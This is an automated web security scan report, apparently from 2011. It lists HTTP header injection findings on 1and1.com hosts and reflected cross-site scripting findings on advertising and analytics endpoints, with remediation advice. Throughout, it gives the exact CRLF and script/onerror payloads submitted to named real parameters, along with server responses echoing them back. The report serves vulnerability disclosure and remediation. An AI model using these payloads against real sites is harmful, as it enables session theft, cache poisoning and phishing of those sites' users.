HTTP header injection vulnerabilities arise when user-supplied data is copied into a response header in an unsafe way. If an attacker can inject newline characters into the header, then they can inject new HTTP headers and also, by injecting an empty line, break out of the headers into the message body and write arbitrary content into the application's response.
Various kinds of attack can be delivered via HTTP header injection vulnerabilities. Any attack that can be delivered via cross-site scripting can usually be delivered via header injection, because the attacker can construct a request which causes arbitrary JavaScript to appear within the response body. Further, it is sometimes possible to leverage header injection vulnerabilities to poison the cache of any proxy server via which users access the application. Here, an attacker sends a crafted request which results in a "split" response containing arbitrary content. If the proxy server can be manipulated to associate the injected response with another URL used within the application, then the attacker can perform a "stored" attack against this URL which will compromise other users who request that URL in future.
Issue remediation
If possible, applications should avoid copying user-controllable data into HTTP response headers. If this is unavoidable, then the data should be strictly validated to prevent header injection attacks. In most situations, it will be appropriate to allow only short alphanumeric strings to be copied into headers, and any other input should be rejected. At a minimum, input containing any characters with ASCII codes less than 0x20 should be rejected.
The value of REST URL parameter 3 is copied into the Location response header. The payload 2ddde%0d%0a15f27619d53 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload 3c70c%0d%0ac7d3ec588de was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload f6651%0d%0a1f3ed0baf2c was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload f81df%0d%0a8ac77d3226 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload cf19b%0d%0abd512bc408d was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
1.6. http://mywebsite.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://mywebsite.1and1.com
Path:
/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload bf42f%0d%0a0a2e5487a6a was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the origin.page request parameter is copied into the Location response header. The payload 11d40%0d%0aec5e36e0f3b was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload bef90%0d%0a11c14971bbd was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of the startClub request parameter is copied into the Location response header. The payload e979c%0d%0a3195436f668 was submitted in the startClub parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 1d2d8%0d%0a4b0a099611f was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
The value of the __lf request parameter is copied into the Location response header. The payload 1e4d2%0d%0aaf47e65b5a was submitted in the __lf parameter. This caused a response containing an injected HTTP header.
The value of the jsessionid request parameter is copied into the Location response header. The payload 47245%0d%0a60df6232878 was submitted in the jsessionid parameter. This caused a response containing an injected HTTP header.
1.13. http://order.1and1.com/Jumpto [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://order.1and1.com
Path:
/Jumpto
Issue detail
The name of an arbitrarily supplied request parameter is copied into the Location response header. The payload e2d51%0d%0af6b299eb523 was submitted in the name of an arbitrarily supplied request parameter. This caused a response containing an injected HTTP header.
The value of the origin.page request parameter is copied into the Location response header. The payload 654e6%0d%0a476e9112dfd was submitted in the origin.page parameter. This caused a response containing an injected HTTP header.
The value of the page request parameter is copied into the Location response header. The payload c1508%0d%0aa00c42b9c91 was submitted in the page parameter. This caused a response containing an injected HTTP header.
The value of the site request parameter is copied into the Location response header. The payload 97bdb%0d%0aefd6c702fd1 was submitted in the site parameter. This caused a response containing an injected HTTP header.
The value of REST URL parameter 3 is copied into the Location response header. The payload 3d157%0d%0ac8839f14f03 was submitted in the REST URL parameter 3. This caused a response containing an injected HTTP header.
Reflected cross-site scripting vulnerabilities arise when data is copied from a request and echoed into the application's immediate response in an unsafe way. An attacker can use the vulnerability to construct a request which, if issued by another application user, will cause JavaScript code supplied by the attacker to execute within the user's browser in the context of that user's session with the application.
The attacker-supplied code can perform a wide variety of actions, such as stealing the victim's session token or login credentials, performing arbitrary actions on the victim's behalf, and logging their keystrokes.
Users can be induced to issue the attacker's crafted request in various ways. For example, the attacker can send a victim a link containing a malicious URL in an email or instant message. They can submit the link to popular web sites that allow content authoring, for example in blog comments. And they can create an innocuous looking web site which causes anyone viewing it to make arbitrary cross-domain requests to the vulnerable application (using either the GET or the POST method).
The security impact of cross-site scripting vulnerabilities is dependent upon the nature of the vulnerable application, the kinds of data and functionality which it contains, and the other applications which belong to the same domain and organisation. If the application is used only to display non-sensitive public content, with no authentication or access control functionality, then a cross-site scripting flaw may be considered low risk. However, if the same application resides on a domain which can access cookies for other more security-critical applications, then the vulnerability could be used to attack those other applications, and so may be considered high risk. Similarly, if the organisation which owns the application is a likely target for phishing attacks, then the vulnerability could be leveraged to lend credibility to such attacks, by injecting Trojan functionality into the vulnerable application, and exploiting users' trust in the organisation in order to capture credentials for other applications which it owns. In many kinds of application, such as those providing online banking functionality, cross-site scripting should always be considered high risk.
Issue remediation
In most situations where user-controllable data is copied into application responses, cross-site scripting attacks can be prevented using two layers of defences:
Input should be validated as strictly as possible on arrival, given the kind of content which it is expected to contain. For example, personal names should consist of alphabetical and a small range of typographical characters, and be relatively short; a year of birth should consist of exactly four numerals; email addresses should match a well-defined regular expression. Input which fails the validation should be rejected, not sanitised.
User input should be HTML-encoded at any point where it is copied into application responses. All HTML metacharacters, including < > " ' and =, should be replaced with the corresponding HTML entities (< > etc).
In cases where the application's functionality allows users to author content using a restricted subset of HTML tags and attributes (for example, blog comments which allow limited formatting and linking), it is necessary to parse the supplied HTML to validate that it does not use any dangerous syntax; this is a non-trivial task.
The value of the cc request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a8a90"><script>alert(1)</script>217a337aa5b was submitted in the cc parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the clk request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 82846'%3balert(1)//bc7259a2a3e was submitted in the clk parameter. This input was echoed as 82846';alert(1)//bc7259a2a3e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Cache-Control: private Pragma: no-cache Content-Length: 729 Content-Type: text/html Expires: Sun, 16 Oct 2011 00:22:30 GMT Server: Microsoft-IIS/7.0 Set-Cookie: FSVWA084117885=uid=7016340; expires=Mon, 17-Oct-2011 00:23:30 GMT; domain=.adsfac.eu; path=/ Set-Cookie: FSVWA084=pctm=3&FM144706=3&fpt=0%2C117885%2C&pct%5Fdate=4306&pctl=117885&FL117885=3&pctc=144706&FQ=3; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/ Set-Cookie: UserID=610040839265718; expires=Wed, 16-Nov-2011 01:23:30 GMT; domain=.adsfac.eu; path=/ P3P: CP="NOI DSP COR CUR PSA OUR BUS UNI NAV INT" Date: Sun, 16 Oct 2011 00:23:30 GMT Connection: close
<html><body> <script type="text/javascript"> if (typeof(fd_clk) == 'undefined') {var fd_clk = '82846';alert(1)//bc7259a2a3ehttp://adsfac.eu/link.asp?cc=VWA084.117885.0&CreativeID=144706';}; var fd_imp='http://cdn.adsfac.eu/ads/VWA084/144706.0.0.swf'; var fd_bak='http://adsfac.eu/creative.asp?CreativeID=144706'; var fd_b ...[SNIP]...
The value of the clk request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4dc72"><script>alert(1)</script>f885aaf88a2 was submitted in the clk parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of REST URL parameter 2 is copied into the HTML document as plain text between tags. The payload c33b9<script>alert(1)</script>6afa09c7826 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the action request parameter is copied into the HTML document as plain text between tags. The payload e350b<img%20src%3da%20onerror%3dalert(1)>6cc434dab0e was submitted in the action parameter. This input was echoed as e350b<img src=a onerror=alert(1)>6cc434dab0e in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 8ec62<script>alert(1)</script>4b069b5a65f was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 71a79<img%20src%3da%20onerror%3dalert(1)>9cea6436f9d was submitted in the mbox parameter. This input was echoed as 71a79<img src=a onerror=alert(1)>9cea6436f9d in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
The value of the mboxId request parameter is copied into the HTML document as plain text between tags. The payload e3302<script>alert(1)</script>df23f11db5e was submitted in the mboxId parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mbox request parameter is copied into the HTML document as plain text between tags. The payload 6b48c<script>alert(1)</script>d37c751e8df was submitted in the mbox parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
The value of the mboxFactoryId request parameter is copied into a JavaScript string which is encapsulated in single quotation marks. The payload 5140f'%3balert(1)//810eef61a7b was submitted in the mboxFactoryId parameter. This input was echoed as 5140f';alert(1)//810eef61a7b in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c67e3"><a>922b46dfc9f was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Omniture AWS/2.0.0 Last-Modified: Sun, 16 Oct 2011 00:58:07 GMT P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA" Vary: Accept-Encoding xserver: www6.dmz Content-Type: text/html; charset=utf-8 Content-Length: 48025 Cache-Control: public, max-age=14400 Expires: Sun, 16 Oct 2011 04:58:07 GMT Date: Sun, 16 Oct 2011 00:58:07 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en"> <head> <title>Adobe Online Marketing Suite po ...[SNIP]... <link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en§ion=%0A%22%3E%3Ca%3Exsssssc67e3"><a>922b46dfc9f&ignore_skin=0" /> ...[SNIP]...
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 51b34"><a>51370b9834b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
HTTP/1.1 404 Not Found Server: Omniture AWS/2.0.0 Last-Modified: Sun, 16 Oct 2011 01:06:32 GMT P3P: CP="ALL DSP COR CURa ADMa DEVo PSAo CONo TELo OUR IND PHY ONL UNI COM NAV INT DEM STA" Vary: Accept-Encoding xserver: www6.dmz Content-Type: text/html; charset=utf-8 Content-Length: 48129 Cache-Control: public, max-age=14400 Expires: Sun, 16 Oct 2011 05:06:32 GMT Date: Sun, 16 Oct 2011 01:06:32 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//en" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xml:lang="en" lang="en"> <head> <title>Adobe Online Marketing Suite po ...[SNIP]... <link rel="stylesheet" type="text/css" media="screen" href="http://style.omniture.com/stylesheet.css?lang=en§ion=%0A%22%3E%3Ca%3Exsssssc67e3%22%3E%3Ca%3E922b46dfc9f51b34"><a>51370b9834b&ignore_skin=0" /> ...[SNIP]...
The value of the country request parameter is copied into the HTML document as plain text between tags. The payload 384cb<a>8a75cc362dc was submitted in the country parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the partnerid request parameter is copied into the HTML document as plain text between tags. The payload 6765b<a>552c8089353 was submitted in the partnerid parameter. This input was echoed unmodified in the application's response.
This behaviour demonstrates that it is possible to inject new HTML tags into the returned document. An attempt was made to identify a full proof-of-concept attack for injecting arbitrary JavaScript but this was not successful. You should manually examine the application's behaviour and attempt to identify any unusual input validation or other obstacles that may be in place.
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 13371<img%20src%3da%20onerror%3dalert(1)>6da321cd681 was submitted in the f parameter. This input was echoed as 13371<img src=a onerror=alert(1)>6da321cd681 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:23:11 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 198 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 028224 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"tldListCommonAdditional13371<img src=a onerror=alert(1)>6da321cd681\" to access","ee":"ParameterException"}}}
The value of the m request parameter is copied into the HTML document as plain text between tags. The payload e2767<img%20src%3da%20onerror%3dalert(1)>8319f53054f was submitted in the m parameter. This input was echoed as e2767<img src=a onerror=alert(1)>8319f53054f in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:22:59 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 215 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 518440 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonDatae2767<img src=a onerror=alert(1)>8319f53054f\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}
The value of the o request parameter is copied into the HTML document as plain text between tags. The payload f37f7<img%20src%3da%20onerror%3dalert(1)>5a916765f3 was submitted in the o parameter. This input was echoed as f37f7<img src=a onerror=alert(1)>5a916765f3 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:22:47 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 198 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 838164 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"jsonf37f7<img src=a onerror=alert(1)>5a916765f3\"","ee":"ServiceParameterException","p":["o"]}}}
The value of the f request parameter is copied into the HTML document as plain text between tags. The payload 9c120<img%20src%3da%20onerror%3dalert(1)>0ebd76842c1 was submitted in the f parameter. This input was echoed as 9c120<img src=a onerror=alert(1)>0ebd76842c1 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:22:58 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 197 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 468307 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":0,"em":"Module \"commonData\" has no public function \"isEverLoggedInCustomer9c120<img src=a onerror=alert(1)>0ebd76842c1\" to access","ee":"ParameterException"}}}
The value of the m request parameter is copied into the HTML document as plain text between tags. The payload 6f144<img%20src%3da%20onerror%3dalert(1)>8c14f811c07 was submitted in the m parameter. This input was echoed as 6f144<img src=a onerror=alert(1)>8c14f811c07 in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:22:49 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 215 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 865011 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":906,"em":"Module \"commonData6f144<img src=a onerror=alert(1)>8c14f811c07\" is not a registered module for this service implementation","ee":"ServiceParameterException","p":["m"]}}}
The value of the o request parameter is copied into the HTML document as plain text between tags. The payload 367fc<img%20src%3da%20onerror%3dalert(1)>7f7f876415c was submitted in the o parameter. This input was echoed as 367fc<img src=a onerror=alert(1)>7f7f876415c in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses an event handler to introduce arbitrary JavaScript into the document.
HTTP/1.0 200 OK Date: Sun, 16 Oct 2011 00:22:41 GMT Server: Apache Vary: User-Agent,Accept-Encoding Content-Length: 199 Content-Type: text/plain; charset="utf-8" X-Cache: MISS from 028224 Connection: keep-alive
{"h":{"v":"0.1","s":255,"e":{"ec":902,"em":"Response type parameter \"o\" has the unsupported value \"json367fc<img src=a onerror=alert(1)>7f7f876415c\"","ee":"ServiceParameterException","p":["o"]}}}
Report generated by XSS.CX at Sun Oct 16 06:44:45 CDT 2011.